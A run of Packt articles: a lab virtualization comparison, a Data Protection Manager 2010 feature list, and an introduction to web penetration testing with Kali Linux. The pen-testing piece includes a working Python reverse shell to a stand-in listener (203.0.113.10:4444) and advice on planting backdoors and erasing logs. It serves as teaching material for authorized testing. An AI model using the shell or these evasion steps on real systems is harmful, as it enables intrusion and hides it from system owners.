In the fourth step, we designed our lab network based on the determined resources. We chose to put all the hosts in the same subnet to make the lab easier to set up. The subnet has its own DHCP server to dynamically assign network addresses to hosts.

There's more...

Let me give you an account of alternative ways to plan the lab environment details.

Lab environment component variations

It is not necessary to use a laptop as the attacker machine and a tablet PC as the victim – you just need two PCs with connected Wi-Fi adapters to perform various wireless attacks. As an alternative to virtual machines, a laptop, and a tablet PC, old unused computers (if you have them) could also serve as hardware hosts. There is only one condition – their hardware resources should be enough for the planned OSs to work.
An IPS could be either software or hardware, but hardware systems are more expensive. For our needs, it is enough to use any freeware Internet security software that includes both firewall and IPS functionality. It is not essential to choose the same OSs as I have chosen in this chapter; you can use any other OSs that support the required functionality. The same is true of network services – it is not necessary to use an FTP service; you can use any other service that supports network password authentication, such as Telnet or SSH. You will have to additionally install a debugger on one of the victim's workstations in order to test new or modified exploits and perform vulnerability research, if you need to. Finally, you can use any other hardware or virtual router that supports LAN routing and Wi-Fi access point functionality. A connected, dedicated LAN router and Wi-Fi access point are also suitable for the lab.

Choosing virtualization solutions – pros and cons

Here, I want to list some pros and cons of the different virtualization solutions:

VMware ESXi
- Pros: enterprise solution; powerful; easily supports a lot of virtual machines on the same physical server as separate partitions; no need to install a host OS
- Cons: very high cost; requires a powerful server; requires processor virtualization support

VMware Workstation
- Pros: comfortable to work with; user-friendly GUI; easy to install; virtual *nix systems work fast; works better with virtual graphics
- Cons: shareware; sometimes faces problems with USB Wi-Fi adapters on Windows 7; demanding towards system resources; does not support 64-bit guest OSs; virtual Windows systems work slowly

VMware Player
- Pros: freeware; user-friendly GUI; easy to install
- Cons: cannot create new virtual machines; poor functionality

Microsoft Virtual PC
- Pros: freeware; great compatibility and stability with Microsoft systems; good USB support; easy to install
- Cons: works only on Windows and only with Windows; does not support a lot of features that competing solutions do

Oracle VirtualBox
- Pros: freeware; virtual Windows systems work fast; user-friendly GUI; easy to install; works on Mac OS and Solaris as well as on Windows and Linux; supports the "Teleportation" technology
- Cons: paid USB support; virtual *nix systems work slowly

Here, I have listed only the leaders of the virtualization market, in my opinion. Historically, I am mostly accustomed to VMware Workstation, but of course, you can choose any other solution that you may like. You can find more comparison info at http://virt.kernelnewbies.org/TechComparison.

Summary

This article explained how you can plan your lab environment.

Further resources on this subject: FAQs on BackTrack 4 [Article], CISSP: Vulnerability and Penetration Testing for Access Control [Article], BackTrack 4: Target Scoping [Article]


The DPM Feature Set

Packt
29 Jul 2011
3 min read
DPM has a robust set of features and capabilities. The following are some of the most valuable ones:

- Disk-based data protection and recovery
- Continuous backup
- Tape-based archiving and backup
- Built-in monitoring
- Cloud-based backup and recovery
- Built-in reports and notifications
- Integration with Microsoft System Center Operations Manager
- Windows PowerShell integration for scripting
- Remote administration
- Tight integration with other Microsoft products
- Protection of clustered servers
- Protection of application-specific servers
- Backing up the system state
- Backing up client computers

New features of DPM 2010

Microsoft has done a great job of updating Data Protection Manager 2010 with great new features and some much-needed improvements. There were some issues with Data Protection Manager 2007 that would force an administrator to perform routine maintenance on it; most of these have been resolved in Data Protection Manager 2010. The following are the most exciting additions to DPM:

- DPM 2007 to DPM 2010 in-place upgrade.
- Auto-Rerun and Auto-CC (Consistency Check) automatically fix Replica Inconsistent errors.
- Auto-Grow will automatically grow volumes as needed. It also allows you to shrink volumes as needed.
- Bare metal restore.
- A backup SLA report that can be configured and e-mailed to you daily.
- A self-restore service for SQL backups, for SQL database administrators.
- When backing up SharePoint 2010, no recovery farm is required for item-level recoveries (for example, recovering SharePoint list items, or recovering items in a SharePoint farm using host headers). This is an improvement in SharePoint that DPM takes advantage of.
- Better backup for mobile or disconnected employees (this requires VPN or Direct Access).
- End users of protected clients are able to recover their own data, without an administrator doing anything.
- DPM is Live Migration aware. We already know DPM can protect VMs on Hyper-V; now DPM will automatically continue protection of a VM even after it has been migrated to a different Hyper-V server. The Hyper-V server has to be a Windows Server 2008 R2 clustered server.
- DPM2DPM4DR (DPM to DPM for Disaster Recovery) allows you to back up your DPM server to a second DPM server. This feature was available in 2007, and it can now be set up via the GUI. You can also perform chained DPM backups, so you could have DPM A backing up to DPM B, and DPM B to DPM C. Previously, you could only have a secondary DPM server backing up a primary DPM server.

With the 2010 release, a single DPM server's scalability has been increased over the previous 2007 release:

- DPM can handle 80 TB per server
- DPM can back up as many as 100 servers
- DPM can back up as many as 1000 clients
- DPM can back up as many as 2000 SQL databases

As you can see from the previous list, there are many enhancements in DPM 2010 that will benefit administrators as well as end users.

Summary

In this article we took a look at the existing as well as new features of DPM.

Further resources on this subject: Installing Data Protection Manager 2010 [article], Overview of Data Protection Manager 2010 [article], Debatching Bulk Data on Microsoft Platform [article]


Penetration Testing and Setup

Packt
27 Sep 2013
35 min read
Penetration Testing goes beyond an assessment by evaluating identified vulnerabilities to verify whether each vulnerability is real or a false positive. For example, an audit or an assessment may utilize scanning tools that report a few hundred possible vulnerabilities across multiple systems. A Penetration Test would attempt to attack those vulnerabilities in the same manner as a malicious hacker, verifying which vulnerabilities are genuine and reducing the list of system vulnerabilities to a handful of real security weaknesses.

The most effective Penetration Tests are the ones that target a very specific system with a very specific goal. Quality over quantity is the true test of a successful Penetration Test. Enumerating a single system during a targeted attack reveals more about system security, and about the response time in handling incidents, than a wide-spectrum attack does. By carefully choosing valuable targets, a Penetration Tester can determine the entire security infrastructure and the associated risk for a valuable asset.

Penetration Testing evaluates the effectiveness of existing security; if a customer does not have strong security, they will receive little value from Penetration Testing services. This is a common misinterpretation and should be clearly explained to all potential customers. As a consultant, it is recommended that Penetration Testing services be offered as a means to verify the security of existing systems, once a customer believes they have exhausted all efforts to secure those systems and are ready to evaluate whether any gaps remain in securing them.

Positioning a proper scope of work is critical when selling Penetration Testing services. The scope of work defines what systems and applications are being targeted, as well as what toolsets may be used to compromise the vulnerabilities that are found. Best practice is working with your customer during a design session to develop an acceptable scope of work that doesn't impact the value of the results.

Web Penetration Testing with Kali Linux, covering the next generation of BackTrack, is a hands-on guide that provides step-by-step methods for finding vulnerabilities and exploiting web applications. This article will cover researching targets; identifying and exploiting vulnerabilities in web applications, as well as in clients using web application services; defending web applications against common attacks; and building Penetration Testing deliverables for a professional services practice. We believe this article is great for anyone who is interested in learning how to become a Penetration Tester, for users who are new to Kali Linux and want to learn its features and the differences between Kali and BackTrack, and for seasoned Penetration Testers who may need a refresher or reference on new tools and techniques.

This article will break down the fundamental concepts behind various security services as well as guidelines for building a professional Penetration Testing practice. Concepts include differentiating a Penetration Test from other services, a methodology overview, and targeting web applications. This article also provides a brief overview of setting up a Kali Linux testing or real environment.

Web application Penetration Testing concepts

A web application is any application that uses a web browser as a client. This can be a simple message board or a very complex spreadsheet.
Web applications are popular because of the ease of access to services and the centralized management of a system used by multiple parties. Requirements for accessing a web application can follow industry web browser client standards, simplifying expectations for both the service providers and the hosts accessing the application.

Web applications are the most widely used type of application within any organization. They are the standard for most Internet-based applications. If you look at smartphones and tablets, you will find that most applications on these devices are also web applications. This has created a new and large target-rich surface for security professionals as well as for attackers exploiting those systems.

Penetration Testing web applications can vary in scope, since there is a vast number of system types and business use cases for web application services. The core web application tiers, which are the hosting servers, the accessing devices, and the data repository, should be tested, along with the communication between the tiers, during a web application Penetration Testing exercise.

An example of developing a scope for a web application Penetration Test is testing a Linux server hosting applications for mobile devices. The scope of work, at a minimum, should include evaluating the Linux server (operating system, network configuration, and so on), the applications hosted from the server, how systems and users authenticate, the client devices accessing the server, and the communication between all three tiers. Additional areas of evaluation that could be included in the scope of work are how devices are obtained by employees, how devices are used outside of accessing the application, the surrounding network(s), maintenance of the systems, and the users of the systems. Some examples of why these other areas of scope matter are having the Linux server compromised by permitting a connection from a mobile device infected by other means, or an authorized mobile device being obtained through social media to capture confidential information.

Some deliverable examples in this article offer checkbox surveys that can assist with walking a customer through possible targets for a web application Penetration Testing scope of work. Every scope of work should be customized around your customer's business objectives, expected timeframe of performance, allocated funds, and desired outcome. As stated before, templates serve as tools to enhance a design session for developing a scope of work.

Penetration Testing methodology

There are logical steps recommended for performing a Penetration Test. The first step is identifying the project's starting status. The most common terminology defining the starting state is Black box testing, White box testing, or a blend between White and Black box testing known as Gray box testing.

Black box testing assumes the Penetration Tester has no prior knowledge of the target network, company processes, or services it provides. Starting a Black box project requires a lot of reconnaissance and is typically a longer engagement, based on the concept that real-world attackers can spend long durations of time studying targets before launching attacks. As security professionals, we find that Black box testing presents some problems when scoping a Penetration Test. Depending on the system and your familiarity with the environment, it can be difficult to estimate how long the reconnaissance phase will last. This usually presents a billing problem.
Customers, in most cases, are not willing to write a blank cheque for you to spend unlimited time and resources on the reconnaissance phase; however, if you do not spend the time needed, then your Penetration Test is over before it has begun. A purely Black box approach is also unrealistic, because a motivated attacker will not necessarily have the same scoping and billing restrictions as a professional Penetration Tester. That is why we recommend Gray box over Black box testing.

White box testing is when a Penetration Tester has intimate knowledge of the system. The goals of the Penetration Test are clearly defined, and the outcome of the report from the test is usually expected. The tester has been provided with details on the target, such as network information, the types of systems, company processes, and services. White box testing is typically focused on a particular business objective, such as meeting a compliance need, rather than a generic assessment, and can be a shorter engagement, depending on how the target space is limited. White box assignments can reduce information gathering efforts, such as reconnaissance services, which means less cost for Penetration Testing services.

Gray box testing falls in between Black and White box testing. It is when the client or system owner agrees that some unknown information would eventually be discovered during a Reconnaissance phase, but allows the Penetration Tester to skip this part. The Penetration Tester is provided with some basic details of the target; however, internal workings and some other privileged information are still kept from the Penetration Tester. Real attackers tend to have some information about a target prior to engaging it. Most attackers (with the exception of script kiddies, or individuals downloading tools and running them) do not choose random targets. They are motivated and have usually interacted in some way with their target before attempting an attack. Gray box is an attractive approach for many security professionals conducting Penetration Tests because it mimics the real-world approaches used by attackers and focuses on vulnerabilities rather than reconnaissance.

The scope of work defines how penetration services will be started and executed. Kicking off a Penetration Testing service engagement should include an information gathering session used to document the target environment and define the boundaries of the assignment, to avoid unnecessary reconnaissance services or attacking systems that are out of scope. A well-defined scope of work will save a service provider from scope creep (defined as uncontrolled changes or continuous growth in a project's scope), keep the engagement within the expected timeframe, and help provide a more accurate deliverable upon concluding services.

Real attackers do not have boundaries such as time, funding, ethics, or tools, meaning that limiting a Penetration Testing scope may not represent a real-world scenario. In contrast to a limited scope, an unlimited scope may never evaluate critical vulnerabilities if a Penetration Test is concluded prior to attacking the desired systems. For example, a Penetration Tester may capture user credentials to critical systems and conclude with accessing those systems, without testing how vulnerable those systems are to network-based attacks. It's also important to include who is aware of the Penetration Test as part of the scope. Real attackers may strike at any time, and probably when people are least expecting it.
Some fundamentals for developing a scope of work for a Penetration Test are as follows:

Definition of Target System(s): This specifies what systems should be tested, including the location on the network, the types of systems, and the business use of those systems.

Timeframe of Work Performed: When the testing should start, and the timeframe provided to meet the specified goals. Best practice is NOT to limit the time scope to business hours.

How Targets Are Evaluated: What types of testing methods, such as scanning or exploitation, are and are not permitted? What is the risk associated with the permitted testing methods? What is the impact if targets become inoperable due to penetration attempts? Examples are: using social networking by pretending to be an employee, a denial of service attack on key systems, or executing scripts on vulnerable servers. Some attack methods pose a higher risk of damaging systems than others.

Tools and Software: What tools and software will be used during the Penetration Test? This is important and a little controversial. Many security professionals believe that if they disclose their tools, they will be giving away their secret sauce. We believe this is only the case when security professionals use widely available commercial products and simply rebrand the canned reports from those products. Seasoned security professionals will disclose the tools being used and, in some cases where vulnerabilities are exploited, documentation of the commands used within the tools to exploit a vulnerability. This makes the exploit re-creatable, and allows the client to truly understand how the system was compromised and the difficulty associated with the exploit.

Notified Parties: Who is aware of the Penetration Test? Are they briefed beforehand and able to prepare? Is reaction to penetration efforts part of the scope being tested? If so, it may make sense not to inform the security operations team prior to the Penetration Test. This is very important when looking at web applications that may be hosted by another party, such as a cloud service provider, that could be impacted by your services.

Initial Access Level: What type of information and access is provided prior to kicking off the Penetration Test? Does the Penetration Tester have access to the server via the Internet and/or the intranet? What level of initial account access is granted? Is this a Black, White, or Gray box assignment for each target?

Definition of Target Space: This defines the specific business functions included in the Penetration Test, for example, conducting a Penetration Test on a specific web application used by sales while not touching a different application hosted on the same server.

Identification of Critical Operation Areas: Define the systems that should not be touched, to avoid a negative impact from the Penetration Testing services. Is the active authentication server off limits? It is important to make critical assets clear prior to engaging a target.

Definition of the Flag: It is important to define how far a Penetration Test should compromise a system or a process. Should data be removed from the network, or should the attacker just obtain a specific level of unauthorized access?

Deliverable: What type of final report is expected? What goals does the client specify to be accomplished upon closing a Penetration Testing service agreement? Make sure the goals are not open-ended, to avoid scope creep in the expected service. Is any of the data classified or designated for a specific group of people?
How should the final report be delivered? It is important to deliver a sample report or periodic updates, so that there are no surprises in the final report.

Remediation Expectations: Are vulnerabilities expected to be documented with possible remediation action items? Who should be notified if a system is rendered unusable during a Penetration Testing exercise? What happens if sensitive data is discovered? Most Penetration Testing services do NOT include remediation of the problems found.

Some service definitions that should be used to define the scope of services are:

Security Audit: Evaluating a system's or an application's risk level against a set of standards or baselines. Standards are mandatory rules, while baselines are the minimal acceptable level of security. Standards and baselines achieve consistency in security implementations and can be specific to industries, technologies, and processes. Most requests for security services for audits are focused on passing an official audit (for example, preparing for a corporate or a government audit) or proving that the baseline requirements are met for a mandatory set of regulations (for example, following the HIPAA and HITECH mandates for protecting healthcare records). It is important to inform potential customers whether your audit services include any level of insurance or protection if an audit is not successful after your services. It is also critical to document the type of remediation included with audit services (that is, whether you would identify a problem, offer a remediation action plan, or fix the problem). Auditing for compliance is much more than running a security tool. It relies heavily on standard types of reporting, and on following a methodology that is an accepted standard for the audit. In many cases, security audits give customers a false sense of security, depending on what standards or baselines are being audited. Most standards and baselines have a long update process that is unable to keep up with the rapid changes in threats found in today's cyber world. It is HIGHLY recommended to offer security services beyond standards and baselines, to raise the level of security to an acceptable level of protection for real-world threats. Services should include following up with customers to assist with remediation, along with raising the bar for security beyond any industry standards and baselines.

Vulnerability Assessment: This is the process in which network devices, operating systems, and application software are scanned in order to identify the presence of known and unknown vulnerabilities. A vulnerability is a gap, error, or weakness in how a system is designed, used, or protected. When a vulnerability is exploited, it can result in unauthorized access, escalation of privileges, denial of service to the asset, or other outcomes. Vulnerability Assessments typically stop once a vulnerability is found, meaning that the Penetration Tester does not execute an attack against the vulnerability to verify whether it is genuine. A Vulnerability Assessment deliverable provides the potential risk associated with all the vulnerabilities found, along with possible remediation steps. There are many solutions, such as Kali Linux, that can be used to scan for vulnerabilities based on system/server type, operating system, ports open for communication, and other means. Vulnerability Assessments can be White, Gray, or Black box depending on the nature of the assignment. Vulnerability scans are only useful if they calculate risk.
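As a quick illustration of the scanning side of this work, the following is a minimal sketch of driving a scan from Python. It assumes nmap and its bundled NSE scripts are installed; scanme.nmap.org is a host the Nmap project permits scanning, and you should never point this at systems outside your authorized scope.

import subprocess

TARGET = "scanme.nmap.org"  # replace with an authorized, in-scope target

def vulnerability_scan(target):
    # -sV fingerprints service versions; --script vuln runs nmap's
    # vulnerability-detection script category against the target
    result = subprocess.run(
        ["nmap", "-sV", "--script", "vuln", target],
        capture_output=True, text=True, check=True,
    )
    return result.stdout

if __name__ == "__main__":
    print(vulnerability_scan(TARGET))

Output like this still has to be triaged by hand; as discussed next, raw scanner findings are only a starting point.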
The downside of many security audits is vulnerability scan results that make audit reports thicker without providing any real value. Many vulnerability scanners produce false positives, or identify vulnerabilities that are not really there, because they incorrectly identify the operating system, or because they look for specific patches that fix vulnerabilities without accounting for rollup patches (patches that contain multiple smaller patches) or software revisions. Assigning risk to vulnerabilities gives a true definition and sense of how vulnerable a system is. In many cases, this means that the vulnerability reports produced by automated tools will need to be verified manually. Customers will want to know the risk associated with a vulnerability and the expected cost of reducing any risk found. To speak to that cost, it is important to understand how to calculate risk.

Calculating risk

It is important to understand how to calculate the risk associated with the vulnerabilities found, so that a decision can be made on how to react. Most customers look to the CISSP triad of CIA when determining the impact of risk. CIA is the confidentiality, integrity, and availability of a particular system or application. When determining the impact of risk, customers must look at each component individually, as well as the vulnerability in its entirety, to gain a true perspective of the risk and determine the likelihood of impact. It is up to the customer to decide whether the risk associated with a vulnerability justifies or outweighs the cost of the controls required to reduce the risk to an acceptable level. A customer may not be able to spend a million dollars on remediating a threat that compromises guest printers; however, they will be very willing to spend twice as much on protecting systems with the company's confidential data.

The Certified Information Systems Security Professional (CISSP) curriculum lists formulas for calculating risk, as follows. A Single Loss Expectancy (SLE) is the cost of a single loss of an asset, based on its Asset Value (AV). The Exposure Factor (EF) is the impact the loss of the asset will have on the organization, such as the loss of revenue when an Internet-facing server shuts down. Customers should calculate the SLE of an asset when evaluating security investments, to help identify the level of funding that should be assigned for controls. If an SLE would cause a million dollars of damage to the company, it would make sense to consider that in the budget.

The Single Loss Expectancy formula: SLE = AV * EF

The next important formula identifies how often the SLE could occur. If an SLE worth a million dollars could happen once in a million years, such as a meteor falling out of the sky, it may not be worth investing millions in a protective dome around your headquarters. In contrast, if a fire could cause a million dollars worth of damage and is expected every couple of years, it would be wise to invest in a fire prevention system. The number of times an asset is lost per year is called the Annual Rate of Occurrence (ARO). The Annualized Loss Expectancy (ALE) is an expression of the annual anticipated loss due to risk. For example, a falling meteor has a very low annualized expectancy (once in a million years), while a fire is a lot more likely and should be factored into future investments for protecting a building.

The Annualized Loss Expectancy formula: ALE = SLE * ARO
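To make the arithmetic concrete, here is a toy sketch of these two formulas, using invented dollar figures for the fire and meteor examples above:

def single_loss_expectancy(asset_value, exposure_factor):
    # SLE = AV * EF, where EF is the fraction of the asset lost
    return asset_value * exposure_factor

def annualized_loss_expectancy(sle, aro):
    # ALE = SLE * ARO, where ARO is expected losses per year
    return sle * aro

building_value = 1_000_000  # hypothetical asset value in dollars
fire_sle = single_loss_expectancy(building_value, 1.0)   # total loss
fire_ale = annualized_loss_expectancy(fire_sle, 1 / 3)   # a fire every ~3 years
meteor_ale = annualized_loss_expectancy(
    single_loss_expectancy(building_value, 1.0),
    1 / 1_000_000,                                       # once in a million years
)
print(f"Fire ALE:   ${fire_ale:,.0f} per year")    # roughly $333,333
print(f"Meteor ALE: ${meteor_ale:,.0f} per year")  # roughly $1

Numbers like these make it obvious why the fire prevention system is worth budgeting for, while the meteor dome is not.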
The final and important question to answer is the overall risk associated with an asset, which is used to figure out the investment for controls. This determines whether, and how much, the customer should invest in remediating a vulnerability found in an asset.

The risk formula: Risk = Asset Value * Threat * Vulnerability * Impact

It is common for customers not to have values for the variables in Risk Management formulas. These formulas serve as guidance systems to help the customer better understand how they should invest in security. In the previous examples, using the formulas with estimated values for a meteor strike and a fire in a building should help explain, with estimated dollar values, why a fire prevention system is a better investment than a metal dome protecting against falling objects.

Penetration Testing is the method of attacking system vulnerabilities in a similar way to real malicious attackers. Typically, Penetration Testing services are requested when a system or network has exhausted investments in security and clients are seeking to verify whether all avenues of security have been covered. Penetration Testing can be Black, White, or Gray box, depending on the scope of work agreed upon.

The key difference between a Penetration Test and a Vulnerability Assessment is that a Penetration Test acts upon the vulnerabilities found and verifies whether they are real, reducing the list of confirmed risks associated with a target. A Vulnerability Assessment of a target can change into a Penetration Test once the asset owner has authorized the service provider to execute attacks against the vulnerabilities identified in the target. Typically, Penetration Testing services have a higher cost associated with them, since the services require more expensive resources, tools, and time to successfully complete assignments. One popular misconception is that a Penetration Testing service enhances IT security simply because the services cost more than other security services:

Penetration Testing does not make IT networks more secure, since the services evaluate existing security! A customer should not consider a Penetration Test if there is a belief that the target is not completely secure.

Penetration Testing can cause a negative impact on systems: it is critical to have authorization in writing from the proper authorities before starting a Penetration Test of an asset owned by another party. Not having proper authorization could be seen as illegal hacking by the authorities. The authorization should state who is liable for any damages caused during a penetration exercise, as well as who should be contacted to avoid future negative impacts if a system is damaged. Best practice is alerting the customer to all the potential risks associated with each method used to compromise a target prior to executing the attack, to level set expectations. This is also one of the reasons we recommend targeted Penetration Testing with a small scope; it is easier to be much more methodical in your approach. As a common best practice, we obtain confirmation that, in a worst-case scenario, a system can be restored by the customer using backups or some other disaster recovery method.

Penetration Testing deliverable expectations should be well defined while agreeing on a scope of work. The most common method by which hackers obtain information about targets is social engineering, that is, attacking people rather than systems. An example is interviewing for a position within the organization and walking out a week later with sensitive data that was offered without resistance.
This type of deliverable may not be acceptable if a customer is interested in knowing how vulnerable their web applications are to remote attack. It is also important to have a defined end goal, so that all parties understand when the penetration services are considered concluded. Usually, an agreed-upon deliverable serves this purpose.

A Penetration Testing engagement's success, for a service provider, is based on the profitability of the time and services used to deliver the engagement. A more efficient and accurate process means better results for fewer services used. The higher the quality of the deliverables, the more closely the service can meet customer expectations, resulting in a better reputation and more future business. For these reasons, it is important to develop a methodology for executing Penetration Testing services, as well as for reporting what is found.

Kali Penetration Testing concepts

Kali Linux is designed to follow the flow of a Penetration Testing service engagement. Regardless of whether the starting point is White, Black, or Gray box testing, there is a set of steps that should be followed when Penetration Testing a target with Kali or other tools.

Step 1 – Reconnaissance

You should learn as much as possible about a target's environment and system traits prior to launching an attack. The more information you can identify about a target, the better your chance of identifying the easiest and fastest path to success. Black box testing requires more reconnaissance than White box testing, since data is not provided about the target(s). Reconnaissance services can include researching a target's Internet footprint; monitoring resources, people, and processes; scanning for network information such as IP addresses and system types; and social engineering public services such as a help desk.

Reconnaissance is the first step of a Penetration Testing service engagement, regardless of whether you are verifying known information or seeking new intelligence on a target. Reconnaissance begins by defining the target environment based on the scope of work. Once the target is identified, research is performed to gather intelligence on the target, such as what ports are used for communication, where it is hosted, the type of services being offered to clients, and so on. This data shapes a plan of action regarding the easiest methods of obtaining the desired results. The deliverable of a reconnaissance assignment should include a list of all the assets being targeted, the applications associated with the assets, the services used, and the possible asset owners.

Kali Linux offers a category labeled Information Gathering that serves as a Reconnaissance resource. Its tools include methods to research network, data center, wireless, and host systems.

The following is the list of Reconnaissance goals:

Identify target(s)
Define applications and business use
Identify system types
Identify available ports
Identify running services
Passively social engineer information
Document findings
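As a small illustration of the port and service goals above, here is a minimal reconnaissance sketch that resolves a hostname and probes a few common ports. The target shown is hypothetical; only probe systems that are within your authorized scope.

import socket

TARGET = "www.example.com"  # hypothetical in-scope target
COMMON_PORTS = {21: "ftp", 22: "ssh", 25: "smtp", 80: "http", 443: "https"}

def probe(host):
    ip = socket.gethostbyname(host)
    print(f"{host} resolves to {ip}")
    for port, service in COMMON_PORTS.items():
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(2)
            # connect_ex returns 0 when the TCP handshake succeeds
            state = "open" if s.connect_ex((ip, port)) == 0 else "closed/filtered"
            print(f"  {port}/tcp ({service}): {state}")

if __name__ == "__main__":
    probe(TARGET)

Kali's Information Gathering tools perform the same work far more thoroughly; the sketch simply shows what "identify available ports" means in practice.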
Step 2 – Target evaluation

Once a target is identified and researched through Reconnaissance efforts, the next step is evaluating the target for vulnerabilities. At this point, the Penetration Tester should know enough about the target to select how to analyze it for possible vulnerabilities or weaknesses. Examples include testing for weaknesses in how the web application operates, in the identified services, in the communication ports, or by other means.

Vulnerability Assessments and Security Audits typically conclude after this phase of the target evaluation process. Capturing detailed information through Reconnaissance improves the accuracy of targeting possible vulnerabilities, shortens the execution time of target evaluation services, and helps in evading existing security. For example, running a generic vulnerability scanner against a web application server would probably alert the asset owner, take a while to execute, and generate only generic details about the system and its applications. Scanning a server for a specific vulnerability based on data obtained from Reconnaissance would be harder for the asset owner to detect, would provide a good candidate vulnerability to exploit, and would take seconds to execute.

Evaluating targets for vulnerabilities can be manual or automated through tools. There is a range of tools offered in Kali Linux, grouped in a category labeled Vulnerability Analysis. The tools range from assessing network devices to databases.

The following is the list of Target Evaluation goals:

Evaluate targets for weakness
Identify and prioritize vulnerable systems
Map vulnerable systems to asset owners
Document findings

Step 3 – Exploitation

This step exploits the vulnerabilities found, to verify whether the vulnerabilities are real, and what possible information or access can be obtained. Exploitation separates Penetration Testing services from passive services such as Vulnerability Assessments and Audits. Exploitation, and all the steps that follow it, have legal ramifications without authorization from the asset owners of the target.

The success of this step is heavily dependent on previous efforts. Most exploits are developed for specific vulnerabilities, and can cause undesired consequences if executed incorrectly. Best practice is identifying a handful of vulnerabilities and developing an attack strategy that leads with the most vulnerable first. Exploiting targets can be manual or automated, depending on the end objective. Some examples are running SQL injections to gain admin access to a web application, or social engineering a help desk person into providing admin login credentials. Kali Linux offers a dedicated catalog of tools, titled Exploitation Tools, for exploiting targets; these range from tools that exploit specific services to social engineering packages.

The following is the list of Exploitation goals:

Exploit vulnerabilities
Obtain foothold
Capture unauthorized data
Aggressively social engineer
Attack other systems or applications
Document findings

Step 4 – Privilege Escalation

Having access to a target does not guarantee accomplishing the goal of a penetration assignment. In many cases, exploiting a vulnerable system may only give limited access to a target's data and resources. The attacker must escalate the privileges granted in order to gain the access required to capture the flag, which could be sensitive data, critical infrastructure, and so on. Privilege Escalation can include identifying and cracking passwords, user accounts, and unauthorized IT space. An example is achieving limited user access, identifying a shadow file containing administrative login credentials, obtaining an administrator password through password cracking, and then accessing internal application systems with administrator access rights. Kali Linux includes a number of tools that can help with Privilege Escalation, found in the Password Attacks and Exploitation Tools catalogs. Since most of these tools include methods to obtain initial access as well as Privilege Escalation, they are gathered and grouped according to their toolsets.
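For a flavor of the password cracking mentioned above, here is a minimal sketch of an offline dictionary attack against a captured hash. The hash and wordlist are invented for the demonstration; real password stores salt their hashes, and real engagements lean on tools such as John the Ripper or hashcat from the Password Attacks category.

import hashlib

# SHA-256 of the (hypothetical) captured password "summer2013"
captured_hash = hashlib.sha256(b"summer2013").hexdigest()
wordlist = ["password", "letmein", "admin123", "summer2013"]

def dictionary_attack(target_hash, candidates):
    for word in candidates:
        # hash each candidate and compare it against the capture
        if hashlib.sha256(word.encode()).hexdigest() == target_hash:
            return word
    return None

match = dictionary_attack(captured_hash, wordlist)
print(f"Recovered password: {match}" if match else "No match in wordlist")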
The following is a list of Privilege Escalation goals:

Obtain escalated level access to system(s) and network(s)
Uncover other user account information
Access other systems with escalated privileges
Document findings

Step 5 – Maintaining a foothold

The final step is maintaining access by establishing other entry points into the target and, if possible, covering evidence of the penetration. Penetration efforts may trigger defenses that will eventually secure the path the Penetration Tester used to obtain access to the network. Best practice is establishing other means of accessing the target, as insurance against the primary path being closed. Alternative access methods could be backdoors, new administration accounts, encrypted tunnels, and new network access channels.

The other important aspect of maintaining a foothold in a target is removing evidence of the penetration. This makes the attack harder to detect, thus reducing the reaction of security defenses. Removing evidence includes erasing user logs, masking existing access channels, and removing the traces of tampering, such as error messages caused by penetration efforts. Kali Linux includes a catalog titled Maintaining Access, focused on keeping a foothold within a target. The tools are used for establishing various forms of backdoors into a target.

The following is a list of goals for maintaining a foothold:

Establish multiple access methods to the target network
Remove evidence of unauthorized access
Repair systems impacted by exploitation
Inject false data if needed
Hide communication methods through encryption and other means
Document findings
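A classic example of an alternative access method is a connect-back (reverse) shell. The following is a minimal sketch of the idea, with a hypothetical listener address; Kali's Maintaining Access tools build far more robust, and often encrypted, versions of the same concept. A tester would run a listener such as nc -lvp 4444 on the receiving host, and only ever deploy this within an authorized engagement.

import socket
import subprocess

LISTENER = ("203.0.113.10", 4444)  # hypothetical tester-controlled host

def connect_back():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(LISTENER)
    # attach an interactive shell's stdin/stdout/stderr to the socket
    # (POSIX systems only)
    subprocess.call(["/bin/sh", "-i"],
                    stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())

if __name__ == "__main__":
    connect_back()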
Introducing Kali Linux

The creators of BackTrack have released a new, advanced Penetration Testing Linux distribution named Kali Linux. BackTrack 5 was the last major version of the BackTrack distribution. The creators of BackTrack decided that, to move forward with the challenges of cyber security and modern testing, a new foundation was needed. Kali Linux was born, and it was released on March 13th, 2013. Kali Linux is based on Debian and uses an FHS-compliant filesystem.

Kali has many advantages over BackTrack. It comes with many more updated tools. The tools are streamlined with the Debian repositories and synchronized four times a day, which means users have the latest package updates and security fixes. The FHS-compliant filesystem translates into being able to run most tools from anywhere on the system. Kali has also made customization, unattended installation, and flexible desktop environments strong features. Kali Linux is available for download at http://www.kali.org/.

Kali system setup

Kali Linux can be downloaded in a few different ways. One of the most popular ways to get Kali Linux is to download the ISO image, which is available in 32-bit and 64-bit versions. If you plan on using Kali Linux on a virtual machine such as VMware, there is a prebuilt VM image. The advantage of downloading the VM image is that it comes preloaded with VMware Tools. The VM image is a 32-bit image with Physical Address Extension support, better known as PAE. In theory, a PAE kernel allows the system to access more system memory than a traditional 32-bit operating system. There have been some well-known personalities in the world of operating systems who have argued for and against the usefulness of a PAE kernel; however, the authors of this article suggest using the VM image of Kali Linux if you plan on using it in a virtual environment.

Running Kali Linux from external media

Kali Linux can be run without installing software on a host hard drive by booting it from an external media source, such as a USB drive or a DVD. This method is simple to enable; however, it has performance and operational implications. Having to load programs from removable media impacts performance, and some applications or hardware settings may not operate properly. Using read-only storage media does not permit saving the custom settings that may be required to make Kali Linux operate correctly. It is highly recommended to install Kali Linux on a host hard drive.

Installing Kali Linux

Installing Kali Linux on your computer is straightforward and similar to installing other operating systems. First, you will need compatible computer hardware. Kali is supported on the i386, amd64, and ARM (both armel and armhf) platforms. The minimum hardware requirements are shown in the following list, although we suggest exceeding them by at least three times; Kali Linux, in general, will perform better with access to more RAM and when installed on newer machines. Download Kali Linux and either burn the ISO to DVD, or prepare a USB stick with Kali Linux Live as the installation medium. If you do not have a DVD drive or a USB port on your computer, check out the Kali Linux Network Install.

The following is a list of minimum installation requirements:

A minimum of 8 GB of disk space for installing Kali Linux
For the i386 and amd64 architectures, a minimum of 512 MB of RAM
CD/DVD drive or USB boot support

You will also need an active Internet connection before installation. This is very important, or you will not be able to configure and access the repositories during installation.

